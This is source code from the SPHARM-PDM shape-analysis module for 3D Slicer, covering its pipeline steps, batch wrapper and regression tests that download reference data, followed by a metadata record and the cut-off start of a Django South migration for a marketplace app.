# IF Mesh To Label Map has been skipped AND the input given was already a label map
if self.skip_meshToLabelMap and not os.path.exists(MeshToLabelMapOutputFilepath):
PossProcessInputDirectory = inputDirectory
labelmap_input_node = MRMLUtility.loadMRMLNode(self.inputRootname, inputDirectory, self.CaseInput, 'LabelMap')
# ELSE the input given was a model which has been transformed by MeshToLabelMap and store in the folder LabelMap
else:
labelmap_input_node = meshtolabelmap_output_node
PossProcessInputDirectory = MeshToLabelMapOutputDirectory
cli_parameters["fileName"] = labelmap_input_node
pp_output_node = MRMLUtility.createNewMRMLNode(PostProcessOutputRootname, slicer.vtkMRMLLabelMapVolumeNode())
cli_parameters["outfileName"] = pp_output_node.GetID()
if self.interface.RescaleSegPostProcess:
cli_parameters["scaleOn"] = True
cli_parameters["spacing_vect"] = str(self.interface.sx) + "," + str(self.interface.sy) + "," + str(self.interface.sz)
cli_parameters["label"] = self.interface.labelNumber
if self.interface.debug:
cli_parameters["debug"] = True
# Advanced parameters
if self.interface.GaussianFiltering:
cli_parameters["gaussianOn"] = True
cli_parameters["variance_vect"] = str(self.interface.VarianceX) + "," + str(self.interface.VarianceY) + "," + str(self.interface.VarianceZ)
self.setupModule(slicer.modules.segpostprocessclp, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : Step1_SegPostProcess
if not os.path.exists(PostProcessOutputDirectory):
os.makedirs(PostProcessOutputDirectory)
cli_nodes.append(labelmap_input_node)
cli_nodes.append(pp_output_node)
cli_dirnames.append(PossProcessInputDirectory)
cli_dirnames.append(PostProcessOutputDirectory)
self.setupNode(1, cli_nodes, cli_dirnames, [False,True], [True,True])
else:
# Setup of the nodes which will be used by the next CLI
pp_output_node = MRMLUtility.loadMRMLNode(PostProcessOutputRootname, PostProcessOutputDirectory, PostProcessOutputFilename, 'LabelMap')
cli_nodes.append(pp_output_node)
cli_dirnames.append(PostProcessOutputDirectory)
self.setupNode(1, cli_nodes, cli_dirnames, [False], [True])
## Generate Mesh Parameters
cli_nodes = list() # list of the nodes used in the Generate Mesh Parameters step
cli_dirnames = list() # list of the directory pathes where the nodes used in the Generate Mesh Parameters step are stored
GenParaMeshOutputDirectory = outputDirectory + "/Step2_GenParaMesh"
GenParaMeshOutputParaRootname = PostProcessOutputRootname + "_para"
GenParaMeshOutputSurfRootname = PostProcessOutputRootname + "_surf"
GenParaMeshOutputParaFilename = PostProcessOutputRootname + "_para.vtk"
GenParaMeshOutputSurfFilename = PostProcessOutputRootname + "_surf.vtk"
if not self.skip_genParaMesh:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
cli_parameters["infile"] = pp_output_node
para_output_model = MRMLUtility.createNewMRMLNode(GenParaMeshOutputParaRootname, slicer.vtkMRMLModelNode())
cli_parameters["outParaName"] = para_output_model
surfmesh_output_model = MRMLUtility.createNewMRMLNode(GenParaMeshOutputSurfRootname, slicer.vtkMRMLModelNode())
cli_parameters["outSurfName"] = surfmesh_output_model
cli_parameters["numIterations"] = self.interface.NumberofIterations
if self.interface.debug:
cli_parameters["debug"] = True
self.setupModule(slicer.modules.genparameshclp, cli_parameters)
# Setup of the nodes created by the CLI
# Creation of a folder in the output folder : Step2_GenParaMesh
if not os.path.exists(GenParaMeshOutputDirectory):
os.makedirs(GenParaMeshOutputDirectory)
cli_nodes.append(para_output_model)
cli_nodes.append(surfmesh_output_model)
cli_dirnames.append(GenParaMeshOutputDirectory)
cli_dirnames.append(GenParaMeshOutputDirectory)
self.setupNode(2, cli_nodes, cli_dirnames, [True,True], [True,True])
else:
# Setup of the nodes which will be used by the next CLI
para_output_model = MRMLUtility.loadMRMLNode(GenParaMeshOutputParaRootname, GenParaMeshOutputDirectory, GenParaMeshOutputParaFilename, 'ModelFile')
surfmesh_output_model = MRMLUtility.loadMRMLNode(GenParaMeshOutputSurfRootname, GenParaMeshOutputDirectory, GenParaMeshOutputSurfFilename, 'ModelFile')
cli_nodes.append(para_output_model)
cli_nodes.append(surfmesh_output_model)
cli_dirnames.append(GenParaMeshOutputDirectory)
cli_dirnames.append(GenParaMeshOutputDirectory)
self.setupNode(2, cli_nodes, cli_dirnames, [False, False], [True, True])
## Parameters to SPHARM Mesh
cli_nodes = list() # list of the nodes used in the Parameters To SPHARM Mesh step
cli_dirnames = list() # list of the directory pathes where the nodes used in the Parameters To SPHARM Mesh step are stored
SPHARMMeshOutputDirectory = outputDirectory + "/Step3_ParaToSPHARMMesh"
if not self.skip_paraToSPHARMMesh:
# Search of the flip to apply:
# 1 = flip along axes of x & y,
# 2 = flip along y & z,
# 3 = flip along x & z
# 4 = flip along x,
# 5 = flip along y,
# 6 = flip along x & y & z,
# 7 = flip along z where y is the smallest, x is the second smallest and z is the long axis of the ellipsoid
# 8 = All the flips
if not self.interface.sameFlipForAll:
# Recovery of the flip chosen by the user
row = self.pipelineID
widget = self.interface.tableWidget_ChoiceOfFlip.cellWidget(row, 1)
tuple = widget.children()
comboBox = qt.QComboBox()
comboBox = tuple[1]
flipIndexToApply = comboBox.currentIndex
pass
else:
flipIndexToApply = self.interface.choiceOfFlip
# Only one flip to apply
if flipIndexToApply < 8:
L = [1]
# All the flips to apply
else:
L = list(range(1,8))
for i in L:
# Setup of the parameters of the CLI
self.ID += 1
cli_parameters = {}
cli_parameters["inParaFile"] = para_output_model
cli_parameters["inSurfFile"] = surfmesh_output_model
# Creation of a folder in the output folder : Step3_ParaToSPHARMMesh
if not os.path.exists(SPHARMMeshOutputDirectory):
os.makedirs(SPHARMMeshOutputDirectory)
if flipIndexToApply < 8:
SPHARMMeshRootname = SPHARMMeshOutputDirectory + "/" + GenParaMeshOutputSurfRootname
cli_parameters["outbase"] = SPHARMMeshRootname
# For each flip creation of an output filename
else:
flipName = ['AlongXY', 'AlongYZ', 'AlongXZ', 'AlongX', 'AlongY', 'AlongXYZ', 'AlongZ']
SPHARMMeshRootname = SPHARMMeshOutputDirectory + "/" + self.inputRootname + "_flip" + flipName[i - 1] + "_pp_surf"
cli_parameters["outbase"] = SPHARMMeshRootname
cli_parameters["subdivLevel"] = self.interface.SubdivLevelValue
cli_parameters["spharmDegree"] = self.interface.SPHARMDegreeValue
cli_parameters["thetaIteration"] = self.interface.thetaIterationValue
cli_parameters["phiIteration"] = self.interface.phiIterationValue
if self.interface.medialMesh:
cli_parameters["medialMesh"] = True
if self.interface.debug:
cli_parameters["debug"] = True
# Advanced parameters
if self.interface.useRegTemplate:
cli_parameters["regTemplateFileOn"] = True
regtemplate_filepath = self.interface.regTemplate
regtemplate_dir = os.path.split(regtemplate_filepath)[0]
regtemplate_rootname = os.path.split(regtemplate_filepath)[1].split(".")[0]
regtemplate_filename = os.path.split(regtemplate_filepath)[1]
regtemplate_model = MRMLUtility.loadMRMLNode(regtemplate_rootname, regtemplate_dir, regtemplate_filename, 'ModelFile')
cli_parameters["regTemplateFile"] = regtemplate_model
cli_nodes.append(regtemplate_model)
cli_dirnames.append(regtemplate_filepath)
self.setupNode(i + 2, cli_nodes, cli_dirnames, [False], [True])
if self.interface.useFlipTemplate:
cli_parameters["flipTemplateFileOn"] = True
cli_parameters["flipTemplateFile"] = self.interface.flipTemplate
if flipIndexToApply < 8:
cli_parameters["finalFlipIndex"] = flipIndexToApply
else:
cli_parameters["finalFlipIndex"] = i
self.setupModule(slicer.modules.paratospharmmeshclp, cli_parameters)
class ShapeAnalysisModuleWrapper(object):
"""
This class should be called from an external python script to run SPHARM-PDM method on multiple cases thanks to SlicerSALT or 3DSlicer.
External python script (ex: SPHARM-PDM.py) should do the following:
from ShapeAnalasisModule import ShapeAnalysisModuleWrapper
from ConfigParser import SafeConfigParser
parser = SafeConfigParser()
parser.read(sys.argv[1]) #argv[1]: 'path/to/SPHARM-PDM-parameters.ini'
inputDirectoryPath = parser.get('section', 'input-directory-path')
[...]
ShapeAnalysisModuleInstance = ShapeAnalysisModuleWrapper(inputDirectoryPath, outputDirectoryPath, [...])
ShapeAnalysisModuleInstance.startProcessing()
The external python script can be run non-interactively using this command:
./SlicerSalt --no-main-window --python-script /path/to/SPHARM-PDM.py path/to/SPHARM-PDM-parameters.py
"""
def __init__(self, inputDirectoryPath, outputDirectoryPath,
RescaleSegPostProcess, sx, sy, sz, labelNumber,
GaussianFiltering, VarianceX, VarianceY, VarianceZ,
numberofIterations,
SubdivLevelValue, SPHARMDegreeValue,
medialMesh, thetaIterationValue, phiIterationValue,
useRegTemplate, regTemplate,
useFlipTemplate, flipTemplate, choiceOfFlip):
self.Logic = ShapeAnalysisModuleLogic()
self.Logic.parameters.setWaitForCompletion(True)
self.Logic.parameters.setInputDirectory(inputDirectoryPath)
self.Logic.parameters.setOutputDirectory(outputDirectoryPath)
self.Logic.parameters.setRescaleSegPostProcess(RescaleSegPostProcess)
self.Logic.parameters.setSx(sx)
self.Logic.parameters.setSy(sy)
self.Logic.parameters.setSz(sz)
self.Logic.parameters.setLabelNumber(labelNumber)
self.Logic.parameters.setGaussianFiltering(GaussianFiltering)
self.Logic.parameters.setVarianceX(VarianceX)
self.Logic.parameters.setVarianceY(VarianceY)
self.Logic.parameters.setVarianceZ(VarianceZ)
self.Logic.parameters.setNumberofIterations(numberofIterations)
self.Logic.parameters.setSubdivLevelValue(SubdivLevelValue)
self.Logic.parameters.setSPHARMDegreeValue(SPHARMDegreeValue)
self.Logic.parameters.setMedialMesh(medialMesh)
self.Logic.parameters.setThetaIterationValue(thetaIterationValue)
self.Logic.parameters.setPhiIterationValue(phiIterationValue)
self.Logic.parameters.setUseRegTemplate(useRegTemplate)
self.Logic.parameters.setRegTemplate(regTemplate)
self.Logic.parameters.setUseFlipTemplate(useFlipTemplate)
self.Logic.parameters.setFlipTemplate(flipTemplate)
self.Logic.parameters.setChoiceOfFlip(choiceOfFlip)
def startProcessing(self):
# Setup the inputCases
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(self.Logic.parameters.inputDirectory):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
self.Logic.ShapeAnalysisCases()
class ShapeAnalysisModuleTest(ScriptedLoadableModuleTest):
"""
This is the test case for your scripted module.
Uses ScriptedLoadableModuleTest base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
def setUp(self):
slicer.mrmlScene.Clear(0)
self.inputRootnames = list()
def runTest(self):
self.setUp()
self.delayDisplay('Starting the tests')
self.test_ShapeAnalysisModule_completedWithoutErrors()
def test_ShapeAnalysisModule_completedWithoutErrors(self):
self.delayDisplay('Test 1: Run Shape Analysis Module')
self.Logic = ShapeAnalysisModuleLogic()
# Creation of input folder
inputDirectoryPath = slicer.app.temporaryPath + '/InputShapeAnalysisModule'
if not os.path.exists(inputDirectoryPath):
os.makedirs(inputDirectoryPath)
# Download the label map in the input folder
input_downloads = (
('https://data.kitware.com/api/v1/file/59945eb38d777f7d33e9c3c4/download', 'InputImage.gipl'),
)
for i in range(len(input_downloads)):
self.inputRootnames.append(input_downloads[i][1].split(".")[0])
self.download_files(inputDirectoryPath, input_downloads)
# Creation of output folder
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
if not os.path.exists(outputDirectoryPath):
os.makedirs(outputDirectoryPath)
# Creation of a template folder
templateDirectoryPath = slicer.app.temporaryPath + '/TemplateShapeAnalysisModule'
if not os.path.exists(templateDirectoryPath):
os.makedirs(templateDirectoryPath)
else:
for filename in os.listdir(templateDirectoryPath):
os.remove(os.path.join(templateDirectoryPath, filename))
# Download the registration template in the template folder
template_downloads = (
('https://data.kitware.com/api/v1/file/599462f78d777f7d33e9c3e6/download', 'RegistrationTemplateForParaToSPHARMMesh.vtk'),
)
self.download_files(templateDirectoryPath, template_downloads)
#
# Inputs of Shape Analysis Module
#
self.Logic.parameters.setWaitForCompletion(True)
self.Logic.parameters.setInputDirectory(inputDirectoryPath)
self.Logic.parameters.setOutputDirectory(outputDirectoryPath)
self.Logic.parameters.setOverwriteSegPostProcess(True)
self.Logic.parameters.setOverwriteGenParaMesh(True)
self.Logic.parameters.setNumberofIterations(25)
self.Logic.parameters.setOverwriteParaToSPHARMMesh(True)
self.Logic.parameters.setMedialMesh(True)
self.Logic.parameters.setUseRegTemplate(True)
regTemplateFilePath = templateDirectoryPath + '/RegistrationTemplateForParaToSPHARMMesh.vtk'
self.Logic.parameters.setChoiceOfFlip(3)
self.Logic.parameters.setRegTemplate(regTemplateFilePath)
# Setup the inputCases
# Possible extensions
exts = [".gipl", ".gipl.gz", ".mgh", ".mgh,gz", ".nii", ".nii.gz",".nrrd", ".vtk", ".vtp", ".hdr", ".mhd"]
# Search cases and add the filename to a list
self.Logic.InputCases = []
for file in os.listdir(inputDirectoryPath):
for ext in exts:
if file.endswith(ext):
self.Logic.InputCases.append(file)
self.delayDisplay('Run Shape Analysis Module')
self.Logic.ShapeAnalysisCases()
self.assertTrue(self.comparisonOfOutputsSegPostProcess())
self.assertTrue(self.comparisonOfOutputsGenParaMesh())
self.assertTrue(self.comparisonOfOutputsParaToSPHARMMesh())
self.cleanSlicerTemporaryDirectory()
self.delayDisplay('Tests Passed!')
slicer.mrmlScene.Clear(0)
def comparisonOfOutputsSegPostProcess(self):
self.delayDisplay('Test 2: Comparison of the outputs generated by SegPostProcess CLI')
# Checking the existence of the output directory Step1_SegPostProcess
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
SegPostProcessOutputDirectoryPath = outputDirectoryPath + '/Step1_SegPostProcess'
if not os.path.exists(SegPostProcessOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59945ee08d777f7d33e9c3d3/download', 'OutputImageToCompareSegPostProcess.nrrd'),
)
self.download_files(SegPostProcessOutputDirectoryPath, output_downloads)
# Comparison of the Post Process Mesh Outputs
self.delayDisplay('Comparison of the Post Process Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_filename = inputRootname + "_pp.nrrd"
output_filenames.append(output_filename)
for i in range(len(output_filenames)):
volume2_filepath = os.path.join(SegPostProcessOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step1_SegPostProcess
if not os.path.exists(volume2_filepath):
return False
# Loading the 2 volumes for comparison
volume1_rootname = output_filenames[i].split(".")[0]
volume2_rootname = output_downloads[i][1].split(".")[0]
volume1 = MRMLUtility.loadMRMLNode(volume1_rootname, SegPostProcessOutputDirectoryPath, output_downloads[i][1], 'LabelMap')
volume2 = MRMLUtility.loadMRMLNode(volume2_rootname, SegPostProcessOutputDirectoryPath, output_filenames[i], 'LabelMap')
# Comparison
if not self.volume_comparison(volume1, volume2):
return False
return True
def comparisonOfOutputsGenParaMesh(self):
self.delayDisplay('Test 3: Comparison of the outputs generated by GenParaMesh CLI')
# Checking the existence of the output directory Step2_GenParaMesh
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
GenParaMeshOutputDirectoryPath = outputDirectoryPath + '/Step2_GenParaMesh'
if not os.path.exists(GenParaMeshOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59af09588d777f7d33e9cf9d/download', 'OutputImageToCompareGenParaMesh_para.vtk'),
('https://data.kitware.com/api/v1/file/59945ece8d777f7d33e9c3c7/download', 'OutputImageToCompareGenParaMesh_surf.vtk'),
)
self.download_files(GenParaMeshOutputDirectoryPath, output_downloads)
# Comparison of the Parameters Mesh Outputs
self.delayDisplay('Comparison of the Parameters Mesh Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_para_filename = inputRootname + "_pp_para.vtk"
output_surf_filename = inputRootname + "_pp_surf.vtk"
output_filenames.append(output_para_filename)
output_filenames.append(output_surf_filename)
for i in range(len(output_filenames)):
model2_filepath = os.path.join(GenParaMeshOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step2_GenParaMesh
if not os.path.exists(model2_filepath):
return False
# Loading the 2 models for comparison
model1_rootname = output_downloads[i][1].split(".")[0]
model2_rootname = output_filenames[i].split(".")[0]
model1 = MRMLUtility.loadMRMLNode(model1_rootname, GenParaMeshOutputDirectoryPath, output_downloads[i][1], 'ModelFile')
model2 = MRMLUtility.loadMRMLNode(model2_rootname, GenParaMeshOutputDirectoryPath,output_filenames[i], 'ModelFile')
# Comparison
if not self.polydata_comparison(model1, model2):
return False
return True
def comparisonOfOutputsParaToSPHARMMesh(self):
self.delayDisplay('Test 4: Comparison of the outputs generated by ParaToSPHARMMesh CLI')
# Checking the existence of the output directory Step3_ParaToSPHARMMesh
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
ParaToSPHARMMeshOutputDirectoryPath = outputDirectoryPath + '/Step3_ParaToSPHARMMesh'
if not os.path.exists(ParaToSPHARMMeshOutputDirectoryPath):
return False
# Downloading output data to compare with the ones generated by Shape Analysis Module during the tests
output_downloads = (
('https://data.kitware.com/api/v1/file/59af09028d777f7d33e9cf9a/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM.vtk'),
('https://data.kitware.com/api/v1/file/59af09018d777f7d33e9cf91/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM_ellalign.vtk'),
('https://data.kitware.com/api/v1/file/59af09018d777f7d33e9cf94/download', 'OutputImageToCompareParaToSPHARMMesh_MedialMesh.vtk'),
('https://data.kitware.com/api/v1/file/59af09028d777f7d33e9cf97/download', 'OutputImageToCompareParaToSPHARMMesh_SPHARM_procalign.vtk'),
)
self.download_files(ParaToSPHARMMeshOutputDirectoryPath, output_downloads)
# Comparison of the SPHARM Mesh Outputs
self.delayDisplay('Comparison of the SPHARM Mesh Outputs')
output_filenames = list()
for inputRootname in self.inputRootnames:
output_spharm_filename = inputRootname + "_pp_surf_SPHARM.vtk"
output_ellalign_filename = inputRootname + "_pp_surf_SPHARM_ellalign.vtk"
output_medialmesh_filename = inputRootname + "_pp_surf_SPHARMMedialMesh.vtk"
output_procalign_filename = inputRootname + "_pp_surf_SPHARM_procalign.vtk"
output_filenames.append(output_spharm_filename)
output_filenames.append(output_ellalign_filename)
output_filenames.append(output_medialmesh_filename)
output_filenames.append(output_procalign_filename)
for i in range(len(output_filenames)):
model2_filepath = os.path.join(ParaToSPHARMMeshOutputDirectoryPath, output_filenames[i])
# Checking the existence of the output files in the folder Step3_ParaToSPHARMMesh
if not os.path.exists(model2_filepath):
return False
# Loading the 2 models for comparison
model1_rootname = output_downloads[i][1].split(".")[0]
model2_rootname = output_filenames[i].split(".")[0]
model1 = MRMLUtility.loadMRMLNode(model1_rootname, ParaToSPHARMMeshOutputDirectoryPath, output_downloads[i][1], 'ModelFile')
model2 = MRMLUtility.loadMRMLNode(model2_rootname, ParaToSPHARMMeshOutputDirectoryPath, output_filenames[i], 'ModelFile')
# Comparison
if not self.polydata_comparison(model1, model2):
return False
return True
def volume_comparison(self, volume1, volume2):
imageData1 = volume1.GetImageData()
imageData2 = volume2.GetImageData()
nbPoints1 = imageData1.GetNumberOfPoints()
nbPoints2 = imageData2.GetNumberOfPoints()
if not nbPoints1 == nbPoints2:
return False
dimension1 = imageData1.GetDimensions()
dimension2 = imageData2.GetDimensions()
if not dimension1 == dimension2:
return False
for i in range(dimension1[0]):
for j in range(dimension1[1]):
for k in range(dimension1[2]):
if not imageData1.GetScalarComponentAsDouble(i,j,k,0) == imageData2.GetScalarComponentAsDouble(i,j,k,0):
return False
return True
def polydata_comparison(self, model1, model2):
polydata1 = model1.GetPolyData()
polydata2 = model2.GetPolyData()
# Number of points
nbPoints1 = polydata1.GetNumberOfPoints()
nbPoints2 = polydata2.GetNumberOfPoints()
if not nbPoints1 == nbPoints2:
return False
# Polydata
data1 = polydata1.GetPoints().GetData()
data2 = polydata2.GetPoints().GetData()
# Number of Components
nbComponents1 = data1.GetNumberOfComponents()
nbComponents2 = data2.GetNumberOfComponents()
if not nbComponents1 == nbComponents2:
return False
# Points value
for i in range(nbPoints1):
for j in range(nbComponents1):
if not data1.GetTuple(i)[j] == data2.GetTuple(i)[j]:
return False
# Area
nbAreas1 = polydata1.GetPointData().GetNumberOfArrays()
nbAreas2 = polydata2.GetPointData().GetNumberOfArrays()
if not nbAreas1 == nbAreas2:
return False
for l in range(nbAreas1):
area1 = polydata1.GetPointData().GetArray(l)
area2 = polydata2.GetPointData().GetArray(l)
# Name of the area
nameArea1 = area1.GetName()
nameArea2 = area2.GetName()
if not nameArea1 == nameArea2:
return False
# Number of Components of the area
nbComponents1 = area1.GetNumberOfComponents()
nbComponents2 = area2.GetNumberOfComponents()
if not nbComponents1 == nbComponents2:
return False
# Points value in the area
for i in range(nbPoints1):
for j in range(nbComponents1):
if not data1.GetTuple(i)[j] == data2.GetTuple(i)[j]:
return False
return True
def download_files(self, directoryPath, downloads):
self.delayDisplay('Starting download')
for url, name in downloads:
filePath = os.path.join(directoryPath, name)
if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:
print('Requesting download %s from %s...\n' % (name, url))
if sys.version_info[0] == 3:
urllib.request.urlretrieve(url, filePath)
else:
urllib.urlretrieve(url, filePath) # python 2.x
self.delayDisplay('Finished with download')
# Function to delete all the data needed for the tests
def cleanSlicerTemporaryDirectory(self):
# deletion of the SAM input folder
inputDirectoryPath = slicer.app.temporaryPath + '/InputShapeAnalysisModule'
if os.path.exists(inputDirectoryPath):
shutil.rmtree(inputDirectoryPath)
# deletion of the SAM output folder
outputDirectoryPath = slicer.app.temporaryPath + '/OutputShapeAnalysisModule'
if os.path.exists(outputDirectoryPath):
shutil.rmtree(outputDirectoryPath)
# deletion of the SAM template folder
templateDirectoryPath = slicer.app.temporaryPath + '/TemplateShapeAnalysisModule'
if os.path.exists(templateDirectoryPath):
shutil.rmtree(templateDirectoryPath)
| {
"content_hash": "d131beb680a1ece312782b6da85150fa",
"timestamp": "",
"source": "github",
"line_count": 2034,
"max_line_length": 255,
"avg_line_length": 44.441986234021634,
"alnum_prop": 0.7200951380054207,
"repo_name": "NIRALUser/SPHARM-PDM",
"id": "f7b1242ded8bb0e6747b1fa48415b74b0302423e",
"size": "90395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Modules/Scripted/ShapeAnalysisModule/ShapeAnalysisModule.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "54439"
},
{
"name": "C++",
"bytes": "1071539"
},
{
"name": "CMake",
"bytes": "120623"
},
{
"name": "Python",
"bytes": "112150"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'MarketPlaceSettings.twitter_maxlength'
db.alter_column('market_marketplacesettings', 'twitter_maxlength', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True))
def backwards(self, orm):
# Changing field 'MarketPlaceSettings.twitter_maxlength'
db.alter_column('market_marketplacesettings', 'twitter_maxlength', self.gf('django.db.models.fields.IntegerField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'market.contactforminfo': {
'Meta': {'object_name': 'ContactFormInfo'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '64', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"})
},
'market.marketblogpost': {
'Meta': {'object_name': 'MarketBlogPost'},
'allow_comments': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'post_to_twitter': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'posted_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'posted_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '80', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'market.marketcategory': {
'Meta': {'object_name': 'MarketCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('core.thumbs.ImageWithThumbsField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '60', 'db_index': 'True'})
},
'market.marketmailinglistmember': {
'Meta': {'object_name': 'MarketMailingListMember'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['market.MarketPlace']"})
},
'market.marketplace': {
'Meta': {'object_name': 'MarketPlace'},
'base_domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'charge_on_card_as': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'contact_email': ('django.db.models.fields.EmailField', [], {'default': "'[email protected]'", 'max_length': '75'}),
'contact_phone': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '92'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'template_prefix': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '92', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '92'})
},
'market.marketplacesettings': {
'Meta': {'object_name': 'MarketPlaceSettings'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'marketplace': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['market.MarketPlace']", 'unique': 'True'}),
'twitter_access_token': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_access_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_consumer_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'twitter_maxlength': ('django.db.models.fields.IntegerField', [], {'default': '140', 'null': 'True', 'blank': 'True'})
},
'market.marketpostcategory': {
'Meta': {'object_name': 'MarketPostCategory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '80', 'db_index': 'True'}),
